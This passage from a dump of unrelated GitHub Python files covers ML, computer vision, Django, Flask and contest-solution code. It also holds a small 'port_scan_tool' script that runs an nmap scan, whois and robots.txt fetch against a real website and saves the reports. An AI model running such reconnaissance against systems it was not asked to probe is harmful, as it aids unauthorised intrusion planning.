SIG-ON, SIG-OFF, INSIG-ON, NOISE-ON, INSIG-OFF\n all_indices = tf.range(tf.shape(self.ints)[0])\n\n sig_on_mask = tf.logical_and(sig_masks, self.on_mask)\n sig_off_mask = tf.logical_and(sig_masks, tf.logical_not(self.on_mask))\n insig_on_mask = tf.logical_and(tf.logical_not(sig_masks), self.on_mask)\n insig_off_mask = tf.logical_and(tf.logical_not(sig_masks), tf.logical_not(self.on_mask))\n\n sig_on_mask.set_shape([None])\n sig_off_mask.set_shape([None])\n insig_on_mask.set_shape([None])\n insig_off_mask.set_shape([None])\n\n sig_on = tf.boolean_mask(all_indices, sig_on_mask)\n sig_off = tf.boolean_mask(all_indices, sig_off_mask)\n insig_on = tf.boolean_mask(all_indices, insig_on_mask)\n insig_off = tf.boolean_mask(all_indices, insig_off_mask)\n\n new_order = tf.concat([sig_on, sig_off, insig_on, insig_off], axis=0)\n \n # assignments\n self.ints_assign = tf.assign(self.ints, tf.gather(self.ints, new_order))\n self.on_mask_assign = tf.assign(self.on_mask, tf.gather(self.on_mask, new_order))\n \n self.sig_end_assign = tf.assign(self.sig_end, tf.shape(sig_on)[0] + tf.shape(sig_off)[0])\n self.training_end_assign = tf.assign(self.training_end, \n tf.shape(sig_on)[0] + tf.shape(sig_off)[0] + tf.shape(insig_on)[0])\n\n self.on_sig_percentage = tf.cast(tf.shape(sig_on)[0], tf.float64) / \\\n tf.cast(tf.maximum(1, tf.shape(sig_on)[0] + tf.shape(insig_on)[0]), tf.float64)\n self.off_sig_percentage = tf.cast(tf.shape(sig_off)[0], tf.float64) / \\\n tf.cast(tf.maximum(1, tf.shape(sig_off)[0] + tf.shape(insig_off)[0]), tf.float64)\n\n def separate_training_interactions(self):\n\n # IN RANGE INTS\n _, _, _, _, sig_on_per, sig_off_per = self.sess.run([\n self.ints_assign, self.on_mask_assign, self.sig_end_assign, self.training_end_assign,\n self.on_sig_percentage, self.off_sig_percentage])\n\n # finding the percent of unreals for debugging\n if not self.silent_mode:\n print('~~~~~~~')\n print('Percent of sig interactions for %s:' % self.itype)\n print('On: %.4f' % sig_on_per)\n print('Off: %.4f' % sig_off_per)\n print('~~~~~~~')\n","repo_name":"bcb-sut/MaxHiC","sub_path":"Capture/TrainingInteractionsSeparatorModel.py","file_name":"TrainingInteractionsSeparatorModel.py","file_ext":"py","file_size_in_byte":3832,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"13379760009","text":"from ..component import Component\n\nclass gallery(Component):\n def __init__(self, instance_id=\"\", galleryname=\"\", photos=[]):\n Component.__init__(self, \"Gallery\")\n self.instance_id = instance_id\n self.name = galleryname\n self.photos = photos\n self.currentPhoto = 0\n \n def setName(self,name):\n \"\"\"Sets name of the gallery\"\"\"\n self.name = name\n def getName(self):\n \"\"\"Gets name of the gallery\"\"\"\n return self.name\n def addPhoto(self,photoLink):\n \"\"\"Adds given photo to the gallery\"\"\"\n self.photos.append(photoLink)\n def removePhoto(self,photoLink):\n \"\"\"Removes given photo from the gallery if it is there\"\"\"\n try:\n self.photos.remove(photoLink)\n except:\n pass\n def nextPhoto(self):\n if (len(self.photos) == 0):\n return \"

<p>No added photos</p>\"\n        elif (self.currentPhoto == len(self.photos) - 1):\n            self.currentPhoto = 0\n            return self.photos[self.currentPhoto]\n        else:\n            self.currentPhoto += 1\n            return self.photos[self.currentPhoto]\n    \n    def prevPhoto(self):\n        if (len(self.photos) == 0):\n            return \"<p>No added photos</p>\"\n        elif (self.currentPhoto == 0):\n            self.currentPhoto = len(self.photos) - 1 # covers the case when there is only one photo\n            return self.photos[self.currentPhoto]\n        else:\n            self.currentPhoto -= 1\n            return self.photos[self.currentPhoto]\n    \n    def execute(self):\n        # assemble the gallery HTML: heading, current photo, prev/next controls\n        result = \"<div>\"\n        result += '<h3>Gallery: {}</h3>'.format(self.getName())\n        if (len(self.photos) == 0):\n            result+= \"<p>No added photos</p></div>\"\n            return result\n        result += '''<img src=\"{}\" alt=\"Pic\">'''.format(self.photos[self.currentPhoto])\n        result += '<button id=\"prev_{}\">Prev</button>'.format(self.instance_id)\n        result += '<button id=\"next_{}\">Next</button>'.format(self.instance_id)\n        result += \"</div>
\"\n return result","repo_name":"berkyasr/WebDashboard","sub_path":"WebDashboard/wd/components/gallery.py","file_name":"gallery.py","file_ext":"py","file_size_in_byte":2326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"3659574041","text":"import numpy as np\nimport cv2\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nimport operator\n\n\nimg_l = cv2.imread('../../images/task_3_and_4/left_0.png')\nimg_r = cv2.imread('../../images/task_3_and_4/right_0.png')\n\nimages = []\nimages.append(img_l)\nimages.append(img_r)\ngray_l = cv2.cvtColor(img_l, cv2.COLOR_BGR2GRAY)\ngray_r = cv2.cvtColor(img_r, cv2.COLOR_BGR2GRAY)\n\nfs_l = cv2.FileStorage(\"../../parameters/left_camera_intrinsics.xml\", cv2.FILE_STORAGE_READ)\ncameraMatrix_l = fs_l.getNode(\"camera_intrinsic\")\n#print(cameraMatrix_l.mat())\ndistMatrix_l = fs_l.getNode(\"distort_coefficients\")\n\nfs_r = cv2.FileStorage(\"../../parameters/right_camera_intrinsics.xml\", cv2.FILE_STORAGE_READ)\ncameraMatrix_r = fs_r.getNode(\"camera_intrinsic\")\ndistMatrix_r = fs_r.getNode(\"distort_coefficients\")\n\nfs_projection = cv2.FileStorage(\"../../parameters/stereo_rectification.xml\", cv2.FILE_STORAGE_READ)\nprojMtx1 = fs_projection.getNode(\"rectified_projection_matrix_1\")\nprojMtx2 = fs_projection.getNode(\"rectified_projection_matrix_2\")\n\n\n# Undistort left image\nh, w = img_l.shape[:2]\nnewcameramtx, roi = cv2.getOptimalNewCameraMatrix(cameraMatrix_l.mat(), distMatrix_l.mat(), (w, h), 1, (w, h))\nmapx, mapy = cv2.initUndistortRectifyMap(cameraMatrix_l.mat(), distMatrix_l.mat(), None, newcameramtx, (w, h), 5)\ndst = cv2.remap(img_l, mapx, mapy, cv2.INTER_LINEAR)\nx, y, w, h = roi\ndst = dst[y:y + h, x:x + w]\ncv2.imwrite(r'../../output/task_3/l_distort.png', dst)\n\n# Undistort right image\nh, w = img_r.shape[:2]\nnewcameramtx, roi = cv2.getOptimalNewCameraMatrix(cameraMatrix_r.mat(), distMatrix_r.mat(), (w, h), 1, (w, h))\nmapx, mapy = cv2.initUndistortRectifyMap(cameraMatrix_r.mat(), distMatrix_r.mat(), None, newcameramtx, (w, h), 5)\ndst = cv2.remap(img_l, mapx, mapy, cv2.INTER_LINEAR)\nx, y, w, h = roi\ndst = dst[y:y + h, x:x + w]\ncv2.imwrite(r'../../output/task_3/r_distort.png', dst)\n\n\n#ORB\norb = cv2.ORB_create()\nkp_l = orb.detect(gray_l, None)\nimg2_l = cv2.drawKeypoints(gray_l, kp_l, None, color=(0,255,0), flags=0)\nplt.imsave(\"../../output/task_3/l_key_points.png\", img2_l)\n\nkp_r = orb.detect(gray_r, None)\nimg2_r = cv2.drawKeypoints(gray_r, kp_r, None, color=(0,255,0), flags=0)\nplt.imsave(\"../../output/task_3/r_key_points.png\", img2_r)\n\n# left keypoints\nkeypoint_list_l = []\nfor i, keypoint in enumerate(kp_l):\n #print(\"Keypoint:\", i, keypoint)\n keypoint_list_l.append(keypoint)\n\n# sort by response\ncmpfun = operator.attrgetter('response')\nkeypoint_list_l.sort(key=cmpfun, reverse=True)\n\n# find minimum\ndistance = []\nradius_l = []\nkeypoint_i = 0\nfor keypoint in keypoint_list_l:\n # print(\"Keypoint:\", keypoint.response)\n distance.append([])\n if keypoint_i == 0:\n distance[0].append(1)\n for index in range(keypoint_i):\n distance[keypoint_i].append(np.linalg.norm(np.array(keypoint.pt) - np.array(keypoint_list_l[index].pt)))\n radius_l.append(min(distance[keypoint_i]))\n # print(keypoint_i, \" radius_l:\", radius_l[keypoint_i])\n keypoint_i = keypoint_i + 1\n\n# right keypoints\nkeypoint_list_r = []\nfor i, keypoint in enumerate(kp_r):\n keypoint_list_r.append(keypoint)\n\n# sort by 
response\nkeypoint_list_r.sort(key=cmpfun, reverse=True)\n\n# find minimum\ndistance = []\nradius_r = []\nkeypoint_i = 0\nfor keypoint in keypoint_list_r:\n # print(\"Keypoint:\", keypoint.response)\n distance.append([])\n if keypoint_i == 0:\n distance[0].append(1)\n for index in range(keypoint_i):\n distance[keypoint_i].append(np.linalg.norm(np.array(keypoint.pt) - np.array(keypoint_list_r[index].pt)))\n radius_r.append(min(distance[keypoint_i]))\n # print(keypoint_i, \" radius_r:\", radius_r[keypoint_i])\n keypoint_i = keypoint_i + 1\n\n# sort by suppression radius\nkeypoint_list_l = np.c_[keypoint_list_l, radius_l]\nkeypoint_list_l = sorted(keypoint_list_l, key=lambda x:x[1], reverse=True)\n\nkeypoint_list_r = np.c_[keypoint_list_r, radius_r]\nkeypoint_list_r = sorted(keypoint_list_r, key=lambda x:x[1], reverse=True)\n\n# get top n = 10\nkeypoint_list_l = keypoint_list_l[0:20]\nkeypoint_list_l = np.delete(keypoint_list_l, 1, axis=1).transpose()[0]\n\nkeypoint_list_r = keypoint_list_r[0:20]\nkeypoint_list_r = np.delete(keypoint_list_r, 1, axis=1).transpose()[0]\n\nimg3_l = cv2.drawKeypoints(gray_l, keypoint_list_l, None, color=(0,255,0), flags=0)\nimg3_r = cv2.drawKeypoints(gray_r, keypoint_list_r, None, color=(0,255,0), flags=0)\nplt.imsave(\"../../output/task_3/l_suppressed_key_points.png\", img3_l)\nplt.imsave(\"../../output/task_3/r_suppressed_key_points.png\", img3_r)\n#print(keypoint_list)\n#print(kp_l)\n\n\n# step 3: Match features\nkeypoint_list_l, des_l = orb.compute(gray_l, keypoint_list_l)\nkeypoint_list_r, des_r = orb.compute(gray_r, keypoint_list_r)\nmatcher = cv2.BFMatcher(cv2.NORM_HAMMING, crossCheck=True)\nmatches = matcher.match(des_l, des_r)\nimg4 = cv2.drawMatches(gray_l, keypoint_list_l, gray_r, keypoint_list_r, matches, img_l)\nplt.imsave(\"../../output/task_3/matches.png\", img4),plt.show()\n\n# step 4: Triangulate Points\ntwoDPoint_l = []\ntwoDPoint_r = []\nfor keypoint in keypoint_list_l:\n twoDPoint_l.append(keypoint.pt)\nfor keypoint in keypoint_list_r:\n twoDPoint_r.append(keypoint.pt)\ntwoDPoint_l = np.array(twoDPoint_l)\ntwoDPoint_r = np.array(twoDPoint_r)\nundist_l = cv2.undistortPoints(twoDPoint_l, cameraMatrix_l.mat(), distMatrix_l.mat())\nundist_r = cv2.undistortPoints(twoDPoint_r, cameraMatrix_r.mat(), distMatrix_r.mat())\npoints4D = cv2.triangulatePoints(projMtx1.mat(), projMtx2.mat(), undist_l, undist_r)\npoints4D = [c / points4D[3] for c in points4D]\nfig = plt.figure()\nax = fig.add_subplot(111, projection='3d')\nAxes3D.scatter(ax, points4D[0], points4D[1], points4D[2])\nplt.savefig(\"../../output/task_3/3D_features.png\")\n# print(points4D)\n","repo_name":"Sambour/Camera-Model-and-Stereo-Depth-Sensing","sub_path":"code/task_3/task3.py","file_name":"task3.py","file_ext":"py","file_size_in_byte":5734,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"9177011520","text":"from django.urls import path\r\nfrom .views import bajarildi, delete, edit, todo\r\nfrom .api_views import IshListView, IshDetailView\r\n\r\nurlpatterns = [\r\n path('', todo, name='home'),\r\n path('/delete/', delete,name=\"delete\"),\r\n path('/bajarildi/', bajarildi,name=\"bajarildi\"),\r\n path('/edit/', edit,name=\"edit\"),\r\n path('api/v1/', IshListView.as_view()),\r\n path('api/v1//', 
IshDetailView.as_view()),\r\n]","repo_name":"Azizbekbackend/Todo","sub_path":"todo/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"15884620759","text":"# -*- coding: utf-8 -*-\n\n\"\"\"Implementation of factory that create instances containing of triples and numeric literals.tsv.\"\"\"\n\nfrom typing import Tuple\n\nimport numpy as np\nfrom typing import Dict\nfrom poem.constants import PATH_TO_NUMERIC_LITERALS, NUMERIC_LITERALS\nfrom poem.instance_creation_factories.instances import MultimodalOWAInstances, \\\n MultimodalCWAInstances\nfrom poem.instance_creation_factories.triples_factory import TriplesFactory\nfrom poem.preprocessing.numeric_literals_preprocessing_utils.basic_utils import create_matix_of_literals\n\n\nclass TriplesNumericLiteralsFactory(TriplesFactory):\n \"\"\".\"\"\"\n\n def __init__(self, entity_to_id, relation_to_id, numeric_triples):\n super().__init__(entity_to_id, relation_to_id)\n self.literals_to_id = None\n self.numeric_triples = numeric_triples\n self.numeric_literals = None\n self.multimodal_data = None\n\n def _create_numeric_literals(self) -> None:\n \"\"\"\"\"\"\n self.numeric_literals, self.literals_to_id = create_matix_of_literals(numeric_triples=self.numeric_triples,\n entity_to_id=self.entity_to_id)\n self.multimodal_data = {\n NUMERIC_LITERALS: self.numeric_literals\n }\n\n def create_owa_instances(self, triples) -> MultimodalOWAInstances:\n \"\"\"\"\"\"\n owa_instances = super().create_owa_instances(triples=triples)\n\n if self.multimodal_data is None:\n self._create_numeric_literals()\n\n return MultimodalOWAInstances(instances=owa_instances.instances,\n entity_to_id=owa_instances.entity_to_id,\n relation_to_id=owa_instances.relation_to_id,\n kg_assumption=owa_instances.kg_assumption,\n multimodal_data=self.multimodal_data)\n\n def create_cwa_instances(self, triples) -> MultimodalCWAInstances:\n \"\"\".\"\"\"\n cwa_instances = super().create_cwa_instances(triples=triples)\n\n if self.multimodal_data is None:\n self._create_numeric_literals()\n\n return MultimodalCWAInstances(instances=cwa_instances.instances,\n entity_to_id=cwa_instances.entity_to_id,\n relation_to_id=cwa_instances.relation_to_id,\n kg_assumption=cwa_instances.kg_assumption,\n multimodal_data=self.multimodal_data,\n data_relation_to_id=self.literals_to_id,\n labels=cwa_instances.labels)\n","repo_name":"SmartDataAnalytics/POEM","sub_path":"src/poem/instance_creation_factories/triples_numeric_literals_factory.py","file_name":"triples_numeric_literals_factory.py","file_ext":"py","file_size_in_byte":2688,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"52"} +{"seq_id":"37284019898","text":"#\n# @lc app=leetcode id=2327 lang=python3\n#\n# [2327] Number of People Aware of a Secret\n#\n\n# @lc code=start\nclass Solution:\n def peopleAwareOfSecret(self, n: int, delay: int, forget: int) -> int:\n\n # dp = [1] + [0] * (n - 1)\n # MOD = 10**9 + 7\n # share = 0\n # for i in range(1, n):\n # dp[i] = share = (share + dp[i - delay] - dp[i - forget]) % MOD\n # return sum(dp[-forget:]) % MOD\n\n dp = [1] + [0] * forget\n MOD = 10**9 + 7\n share = 0\n for i in range(1, n):\n dp[i % forget] = share = (share + dp[(i - delay) % forget] - dp[i % forget]) % MOD\n return sum(dp) % MOD\n \n# @lc 
code=end\n\n","repo_name":"chenxu0602/LeetCode","sub_path":"2327.number-of-people-aware-of-a-secret.py","file_name":"2327.number-of-people-aware-of-a-secret.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"31502631729","text":"from m_domain_name import *\nfrom m_ip_address import *\nfrom m_make_folder import *\nfrom m_nmap import *\nfrom m_robots_scan import *\nfrom m_whois import *\n\n#sites 폴더 밑 각 사이트 정보를 쌓자\nROOT_DIR = 'sites'\ncreate_dir(ROOT_DIR)\n\ndef gather_info(name, url):\n domain_name = get_domain_name(url)\n ip_address = get_ip_address(url)\n nmap = get_nmap(' -F', ip_address)#F옵션은 빠르게 스캔하라는뜻\n robots_txt = get_robots_txt(url)\n whois = get_whois(domain_name)\n create_report(name, url, domain_name, nmap, robots_txt, whois)\n pass\ndef create_report(name, full_url, domain_name, nmap, robots_txt, whois):\n project_dir(ROOT_DIR + \"/\" + name)\n create_dir(project_dir)\n write_file(project_dir + \"/full_url.txt\", full_url)\n write_file(project_dir + \"/domain_name.txt\", domain_name)\n write_file(project_dir + \"/nmap.txt\", nmap)\n write_file(project_dir + \"/robots_txt.txt\", robots_txt)\n write_file(project_dir + \"/whois.txt\", whois)\ngather_info(\"tistory\", \"https://www.tistory.com/\")","repo_name":"namkiseung/python_BasicProject","sub_path":"Network_program/port_scan_tool/m_scan_main.py","file_name":"m_scan_main.py","file_ext":"py","file_size_in_byte":1042,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"9613466799","text":"\n\nn,a,b=map(int, input().split())\ns=[]\nfor i in range(n):\n s.append(int(input()))\ns.sort()\nif s[0]==s[-1]:\n print(-1)\nelse:\n p=b/(s[-1]-s[0])\n q=a-(p*(sum(s)/n))\n print(p,q)\n","repo_name":"clarinet758/atcoder","sub_path":"arc/r026_050/r043/a1.py","file_name":"a1.py","file_ext":"py","file_size_in_byte":189,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"16681191543","text":"#-*- coding: utf-8 -*-\nfrom django.views import generic\nfrom bitpoint.messenger.models import Message\nfrom decorators import ajax_required\nfrom django.http import HttpResponseRedirect\nfrom .models import Aspirant, Office, Voter, User\nfrom django.contrib.auth.decorators import login_required\nfrom django.shortcuts import get_object_or_404, render, redirect\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\n\n\nclass IndexView(generic.ListView):\n template_name = 'naits/index.html'\n context_object_name = 'latest_poll_list'\n paginate_by = 2\n\n def get_queryset(self):\n return Office.objects.all()[:5]\n\n\nclass DetailView(generic.DetailView):\n model = Office\n template_name = 'naits/detail.html'\n\n\n@login_required\ndef vote(request, poll_id):\n p = get_object_or_404(Office, pk=poll_id)\n if Voter.objects.filter(office_id=poll_id, student_id=request.user.id).exists():\n return render(request, 'naits/detail.html', {\n 'office': p, \n 'error_message': 'You already vote'\n })\n try:\n selected_choice = p.aspirant_set.get(pk=request.POST['aspirants'])\n except (KeyError, Aspirant.DoesNotExist):\n # Redisplay the poll voting form.\n return render(request, 'naits/detail.html', {\n 'office': p,\n 'error_message': \"You didn't select an aspirant.\",\n })\n else:\n selected_choice.votes += 1\n selected_choice.save()\n setuser = Voter(student=request.user, office=p)\n setuser.save()\n # Always return an 
HttpResponseRedirect after successfully dealing\n # with POST data. This prevents data from being posted twice if a\n # user hits the Back button.\n return HttpResponseRedirect('/')\n\n\n@login_required\ndef students(request):\n students_list = User.objects.filter(is_active=True, is_student=True).order_by('-id')\n page = request.GET.get('page', 1)\n paginator = Paginator(students_list, 9)\n try:\n students = paginator.page(page)\n except PageNotAnInteger:\n students = paginator.page(1)\n except EmptyPage:\n students = paginator.page(paginator.num_pages)\n return render(request, 'students/students_list.html', {'students': students})\n\n\n@login_required\ndef staffs(request):\n staffs_list = User.objects.filter(is_active=True, is_d_staff=True).order_by('-id')\n page = request.GET.get('page', 1)\n paginator = Paginator(staffs_list, 9)\n try:\n staffs = paginator.page(page)\n except PageNotAnInteger:\n staffs = paginator.page(1)\n except EmptyPage:\n staffs = paginator.page(paginator.num_pages)\n return render(request, 'staffs/staffs_list.html', {'staffs': staffs})\n\n@login_required\ndef excos(request):\n excos_list = User.objects.filter(is_active=True, is_exco=True).order_by('-id')\n page = request.GET.get('page', 1)\n paginator = Paginator(excos_list, 9)\n try:\n excos = paginator.page(page)\n except PageNotAnInteger:\n excos = paginator.page(1)\n except EmptyPage:\n excos = paginator.page(paginator.num_pages)\n return render(request, 'excos/excos_list.html', {'excos': excos})\n","repo_name":"Abdoulrasheed/Poll","sub_path":"bitpoint/voting/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3170,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"71517895844","text":"from Seq0 import *\n\nprint(\"-----| Exercise 8 |------\")\n\nFOLDER = \"../Session-04/\"\nbases = [\"A\", \"C\", \"T\", \"G\"]\nfiles_list = [\"U5\", \"ADA\", \"FRAT1\", \"FXN\", \"RNU6_269P\"]\n\nfor file in files_list:\n sequence = seq_read_fasta(FOLDER + file + \".txt\")\n dict_bases = seq_count(sequence)\n min_value = 0\n best_base = \"\"\n for base, value in dict_bases.items():\n while value > min_value:\n min_value = value\n best_base = base\n\n print(\"Gene\", file, \" : Most frequent Base: \", best_base)\n","repo_name":"Obijuan/2019-2020-PNE-Practices","sub_path":"P0/winner-Enrique-Feito.py","file_name":"winner-Enrique-Feito.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"36187960744","text":"# libraries\nimport os\nimport sys\n\n# function to make full paths\ndef make_full_path(parent_dir, files):\n\tfull_paths = []\n\tfor i in range(len(files)):\n\t\tfull_paths.append(os.path.join(parent_dir, files[i]))\n\treturn full_paths\n\n# function to search for search_string in a given file\ndef search_for_searchstring(file_path, search_string):\n\tfile_ptr = file(file_path, \"r\")\n\tlines = file_ptr.readlines()\n\tfor i in range(len(lines)):\n\t\tif(lines[i].find(search_string) != -1):\n\t\t\tprint(i + 1, file_path)\n\n# get directory path and if it doesn't exists, then terminate execution\nsearch_dir = raw_input(\"Enter the path of Directory: \")\nif(os.path.exists(search_dir) == False):\n\tprint(\"x x x Path Not Found x x x\")\n\tsys.exit(0)\n\n# check if the entered path is directory or not, if not, then terminate execution\nif(os.path.isdir(search_dir) == False):\n\tprint(\"x x x Entered path is not a directory x x x\")\n\tsys.exit(0)\n\n# 
get type of file look into for search string\nfile_types = raw_input(\"Enter comma-separated file extensions (NO SPACE, WITHOUT DOT) to look for search string: \")\n# check extension list should not have space, if space is there, terminate execution\nif(file_types.find(\" \") != -1):\n\tprint(\"x x x Found spaces x x x\")\n\tsys.exit(0)\nfile_types = file_types.split(\",\")\n\n# get search string\nsearch_string = raw_input(\"Enter search string: \")\n\n# search in all files under each sub-directory\nfiles = os.listdir(search_dir)\npaths_list = make_full_path(search_dir, files)\ni = 0\nwhile(i < len(paths_list)):\n\tcurrent_path = paths_list[i]\n\t# if current_path is a directory\n\tif(os.path.isdir(current_path) == True):\n\t\tfiles = os.listdir(current_path)\n\t\tpaths_list = paths_list + make_full_path(current_path, files)\n\t# if current_path is a file\n\tif(os.path.isfile(current_path) == True):\n\t\tfilename = current_path.split(\"/\")[len(current_path.split(\"/\")) - 1]\n\t\tif(len(filename.split(\".\")) > 1):\n\t\t\tfile_extension = current_path.split(\".\")[1]\n\t\t\tif((file_extension in file_types) == True):\n\t\t\t\tsearch_for_searchstring(current_path, search_string)\n\t# increment index var\n\ti = i + 1\n","repo_name":"sansinghsanjay/search_string","sub_path":"script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":2071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8837442144","text":"from ete3 import Tree\nimport openpyxl\n\n\nwb_obj = openpyxl.load_workbook(\"../data/phylogeny/Lineage_of_32_sp.xlsx\")\nsheet = wb_obj.active\n\nfor i, cols in enumerate(sheet.columns):\n if i == 0:\n ntid = tuple(map(lambda x: x.value, cols[2:]))\n elif i == 7:\n species = tuple(map(lambda x: x.value, cols[2:]))\n elif i == 8:\n labels = tuple(map(lambda x: x.value, cols[2:]))\n\nprefixed_names = map(lambda x: \"-\".join(x), zip(ntid, species))\nnames = dict(zip(labels, prefixed_names))\n\nt = Tree(\"../data/phylogeny/bac120_r95.tree\", format=1, quoted_node_names=True)\nprint(\"Pruning...\")\nt.prune(labels)\nprint(\"Done pruning\")\n\n# Replace IDs with species names\nfor n in t.get_leaves():\n n.name = names[n.name]\n\nt.write(format=9, quoted_node_names=True, outfile=\"Figure-1-B.tree\")\n","repo_name":"grp-bork/multiomics_Wuyts_2022","sub_path":"Figure_1/Figure_1_B.py","file_name":"Figure_1_B.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"43393287145","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n'''\nCreated on 2015年10月10日\n\n@author: ruixidong\n'''\nfrom DataAccess.Handler import RedisCli\nfrom common import utility\nimport time,json\ndef exists(code):\n return RedisCli.hexists(\"Q2k:Codes\", code)\n\ndef apply(url,bites,hours):\n md5=utility.md5code(url)\n RedisCli.hset(\"Q2k:Urls:%s\"%md5,\"state\",0)\n RedisCli.rpush(\"Q2k:Queue:Apply\",json.dumps(dict(url=url,bites=bites,hours=hours)))\n\ndef get_apply_url():\n s=RedisCli.lpop(\"Q2k:Queue:Apply\")\n if s!=None:\n return json.loads(s) \n\ndef get_code(url):\n md5=utility.md5code(url)\n data = RedisCli.hgetall(\"Q2k:Urls:%s\"%md5)\n data[\"state\"] = int(data[\"state\"])\n return data\n\ndef get_url(code):\n return RedisCli.hget(\"Q2k:Codes\",code)\n\n\ndef regist_url(url,bites=8,hours=48):\n \n md5=utility.md5code(url)\n \n cinfo = dict(state=0,code=\"\",url=url,expire=0)\n cinfo.update(RedisCli.hgetall(\"Q2k:Urls:%s\"%md5))\n if 
cinfo[\"state\"]==\"0\":\n if cinfo[\"code\"]==\"\":\n while True:\n code = utility.generateCode(bites)\n if not exists(code):\n break\n time.sleep(0.1)\n cinfo[\"code\"]=code\n \n \n RedisCli.hset(\"Q2k:Codes\", cinfo[\"code\"],url)\n RedisCli.hset(\"Q2k:Urls:%s\"%md5,\"code\",cinfo[\"code\"])\n RedisCli.hset(\"Q2k:Urls:%s\"%md5,\"state\",1)\n \n #默认将过期时间向后延期\n RedisCli.hset(\"Q2k:Urls:%s\"%md5,\"expire\",time.time()+hours*60*60)\n return cinfo[\"code\"]\n ","repo_name":"drxbate/q2k","sub_path":"WEB-APP/DataAccess/QrCode.py","file_name":"QrCode.py","file_ext":"py","file_size_in_byte":1537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"35848837651","text":"import unittest\nimport io\nimport sys\nfrom mineSweeper import MineSweeper\n\nclass test_MineSweeper(unittest.TestCase):\n def setUp(self):\n #given - given for all tests.\n self.game = MineSweeper()\n self.game.createField(3, 3)\n\n def test_createField(self):\n #given - setUp\n\n #when\n field= self.game.field\n\n #then\n self.assertEqual( field , [['.','.','.'],['.','.','.'],['.','.','.']])\n\n def test_layMine(self):\n #given - setUp\n\n #when\n self.game.layMine(0,0)\n\n #then\n self.assertEqual(self.game.field, [['*', '.', '.'], ['.', '.', '.'], ['.', '.', '.']])\n\n\n\n def test_printField(self):\n #given - setUp and capture output methods:\n capturedOutput = io.StringIO()\n sys.stdout = capturedOutput\n\n #when\n self.game.printField()\n\n #then\n sys.stdout = sys.__stdout__\n self.assertEqual(capturedOutput.getvalue(),'\". . .\"\\n\". . .\"\\n\". . .\"\\n')\n\n\n\n def test_play_hit_mine(self):\n #given - setUp\n self.game.layMine(0, 0)\n\n #when\n self.game.play(0,0)\n\n #then\n self.assertEqual(self.game.fieldToPrint, [['*', '.', '.'], ['.', '.', '.'], ['.', '.', '.']])\n\n\n\n def test_play_hit_near_mine(self):\n #given - setUp\n self.game.layMine(0, 0)\n\n #when\n self.game.play(0, 2)\n\n #then\n self.assertEqual(self.game.fieldToPrint, [['*', '1', '+'], ['1', '1', '+'], ['+', '+', '+']])\n\n\n def test_status_PLAYING(self):\n #given - setUp\n self.game.layMine(0, 0)\n self.game.layMine(1, 1)\n\n #when\n self.game.play(2,2)\n\n\n #then\n self.assertEqual(self.game.status() , \"PLAYING\")\n\n def test_status_LOST(self):\n # given - setUp\n self.game.layMine(0, 0)\n self.game.layMine(1, 1)\n\n #when\n self.game.play(1,1)\n\n #then\n self.assertEqual(self.game.status(), \"LOST\")\n\n def test_status_WIN(self):\n # given - setUp\n self.game.layMine(0, 1)\n self.game.layMine(1, 0)\n self.game.layMine(2, 1)\n self.game.layMine(1, 2)\n\n #when\n self.game.play(0,0)\n self.game.play(1, 1)\n self.game.play(2, 2)\n self.game.play(0, 2)\n self.game.play(2, 0)\n\n #then\n self.assertEqual(self.game.status(), \"WIN\")\n\n\n\n\n\n\nif __name__ == '__main__':\n unittest.main()\n\n","repo_name":"TomDamri1/MineSweeper-TDD","sub_path":"test_mineSweepr.py","file_name":"test_mineSweepr.py","file_ext":"py","file_size_in_byte":2435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"30279553198","text":"from flask import Flask, render_template, Request\nfrom markupsafe import escape\nfrom flask_sqlalchemy import SQLAlchemy\nfrom sqlalchemy.sql import text\nimport sqlite3\n\napp = Flask(__name__)\ndb_path = 'backend/mock.db'\nconnection = sqlite3.connect(db_path)\n\nwith open('backend/schema.sql') as f:\n connection.executescript(f.read())\n\ncur = connection.cursor()\ncur.execute(\"INSERT INTO posts (title, content) VALUES 
